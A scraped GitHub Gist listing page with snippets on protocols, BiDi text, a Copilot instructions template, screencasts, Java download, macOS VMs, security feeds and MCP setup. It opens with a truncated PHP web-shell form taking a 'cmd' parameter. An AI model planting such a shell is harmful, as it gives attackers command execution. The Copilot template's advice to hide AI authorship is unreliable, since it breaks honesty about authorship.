Skip to content

Instantly share code, notes, and snippets.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@GOROman
GOROman / CRSFProtocol.md
Last active October 15, 2025 02:41
ExpressLRS / CRSF Protocol 解析メモ
@XVilka
XVilka / BiDiSupport.md
Last active October 15, 2025 02:40
BiDirectional Text

This gist will show the support of BiDirectional text in the terminal emulators and console programs. You can read more about the standardization efforts at the dedicated page of FreeDesktop Terminal BiDi working group.

How to test

Logical Order ◀ ◀ ◀ RTL LTR ▶ ▶ ▶
WHAT IS UNICODE؟ in arabic in arabic ؟EDOCINU SI TAHW ؟EDOCINU SI TAHW in arabic
ما هو الترميز الموحد يونيكود؟ in Arabic ما هو الترميز الموحد يونيكود؟ in Arabic
@h8rt3rmin8r
h8rt3rmin8r / copilot-instructions.md
Created October 10, 2025 01:12
A boilerplate Copilot Instructions markdown template for AI-assisted coding projects (./.github/copilot-instructions.md)

Copilot Instructions

This document provides instructions for AI coding agents to effectively assist in developing the code within this project.

Standards for Writing Style and Tone

  • Always write in a way that reads as genuinely human and free from any linguistic patterns that commonly expose AI-generated text. Avoid all "AI tells," including but not limited to: excessive politeness, generic transitions (e.g., "Furthermore," "In conclusion," "Overall"), filler phrases ("It's important to note that"), parallel-sounding constructions ("not only...but also"), and overly balanced or neatly summarized conclusions.
  • Favor a natural flow that mirrors how an experienced writer or professional would actually communicate:
    • Use sentence length variation (occasional fragments are fine).
  • Use contractions naturally ("I'm," "don't," "that's").
@dergachev
dergachev / GIF-Screencast-OSX.md
Last active October 15, 2025 02:35
OS X Screencast to animated GIF

OS X Screencast to animated GIF

This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.

Screencapture GIF

Instructions

To capture the video (filesize: 19MB), using the free "QuickTime Player" application:

@wavezhang
wavezhang / java_download.sh
Last active October 15, 2025 02:34
download java from oracle without login
wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie" https://download.oracle.com/otn-pub/java/jdk/12.0.2+10/e482c34c86bd4bf8b56c0b35558996b9/jdk-12.0.2_linux-x64_bin.tar.gz
@stefanocoding
stefanocoding / macos_on_ubuntu.md
Last active October 15, 2025 02:33
Install macOS in a VirtualBox machine on Ubuntu

Important: I'm writing this when the last version of macOS (and the one I have installed) is Mojave. There is already a script which installs Mojave in a virtual machine here https://github.com/img2tab/okiomov. But if you are curios how to do everything manually to install High Sierra, then this guide may be useful.

After reading a few articles I ended up with these steps:

  1. On macOS, download the High Sierra installer (even if you have Mojave installed): https://itunes.apple.com/us/app/macos-high-sierra/id1246284741?ls=1&mt=12
  2. If the High Sierra Installer starts, quit it.
  3. Open "Disk Utility".
  4. Click on "File" > "New Image" > "Blank image...". Or just press cmd+N.
@sathwikv143
sathwikv143 / sec_news.opml
Last active October 15, 2025 02:33
Cyber Sec News Feeds
<?xml version="1.0" encoding="UTF-8"?>
<opml version="2.0">
<head>
<title>MyFeed</title>
</head>
<body>
<outline title="Blogs" text="Blogs">
<outline title="The Cloudflare Blog" type="rss" xmlUrl="https://blog.cloudflare.com/rss/" text="The Cloudflare Blog" htmlUrl="https://blog.cloudflare.com/" />
<outline xmlUrl="https://www.rossmanngroup.com/feed/" title="Rossmann Repair Group" text="Rossmann Repair Group" type="rss" htmlUrl="https://rossmanngroup.com" />
<outline text="Google Online Security Blog" type="rss" htmlUrl="http://security.googleblog.com/" xmlUrl="https://security.googleblog.com/feeds/posts/default?alt=rss" title="Google Online Security Blog" />

MCP 설정(Claude Code, Windows)

(저는 참고로 mcp는 안씁니다. 추후 사용할 때를 위해 기록용으로 작성해둡니다.)

# context 7
claude mcp add context7 cmd "/c npx -y @upstash/context7-mcp"
# sequential-thinking
claude mcp add sequential-thinking cmd "/c npx -y @modelcontextprotocol/server-sequential-thinking"
# playwright
@jmanhype
jmanhype / ace_multiplication_results.md
Created October 14, 2025 17:22
ACE Framework: Automatic Prompting Strategy Discovery for Matt Mazur's Multiplication Challenge

ACE Framework: Matt Mazur Multiplication Challenge Results

Demonstrating automatic discovery of prompting strategies for large integer multiplication

The Challenge

Matt Mazur posed a challenge: get LLMs to accurately multiply integers in the 1-10,000 range through prompting strategies alone (not tool calling). His goal is to discover what prompting techniques actually work.

What is ACE?